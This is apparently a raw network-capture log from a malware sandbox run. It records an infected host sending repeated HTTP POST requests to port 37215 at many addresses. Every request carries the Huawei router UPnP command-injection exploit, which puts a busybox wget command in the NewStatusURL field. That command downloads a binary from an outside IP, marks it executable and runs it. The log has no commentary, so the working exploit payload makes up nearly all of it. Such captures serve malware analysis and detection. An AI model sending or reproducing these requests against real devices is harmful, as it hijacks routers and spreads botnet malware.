                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        89192.168.2.144965841.106.105.17637215
                                                        TimestampBytes transferredDirectionData
                                                        Jun 13, 2024 21:31:57.093174934 CEST816OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Content-Length: 430
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        90192.168.2.1450048156.195.134.537215
                                                        TimestampBytes transferredDirectionData
                                                        Jun 13, 2024 21:31:57.093205929 CEST816OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Content-Length: 430
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        91192.168.2.1450792156.194.215.1737215
                                                        TimestampBytes transferredDirectionData
                                                        Jun 13, 2024 21:31:57.093228102 CEST816OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Content-Length: 430
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        92192.168.2.1447840156.164.225.18537215
                                                        TimestampBytes transferredDirectionData
                                                        Jun 13, 2024 21:31:57.093255043 CEST816OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Content-Length: 430
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        93192.168.2.1447370156.64.30.13837215
                                                        TimestampBytes transferredDirectionData
                                                        Jun 13, 2024 21:31:57.093283892 CEST816OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Content-Length: 430
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        94192.168.2.145756041.56.243.11037215
                                                        TimestampBytes transferredDirectionData
                                                        Jun 13, 2024 21:31:57.093324900 CEST816OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Content-Length: 430
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        95192.168.2.144154841.78.181.19437215
                                                        TimestampBytes transferredDirectionData
                                                        Jun 13, 2024 21:31:57.093338966 CEST816OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Content-Length: 430
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        96192.168.2.143618641.8.44.21037215
                                                        TimestampBytes transferredDirectionData
                                                        Jun 13, 2024 21:31:57.093372107 CEST816OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Content-Length: 430
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        97192.168.2.1460954197.137.16.9637215
                                                        TimestampBytes transferredDirectionData
                                                        Jun 13, 2024 21:31:57.093381882 CEST816OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Content-Length: 430
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        98192.168.2.143758841.180.31.8037215
                                                        TimestampBytes transferredDirectionData
                                                        Jun 13, 2024 21:31:57.093421936 CEST816OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Content-Length: 430
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 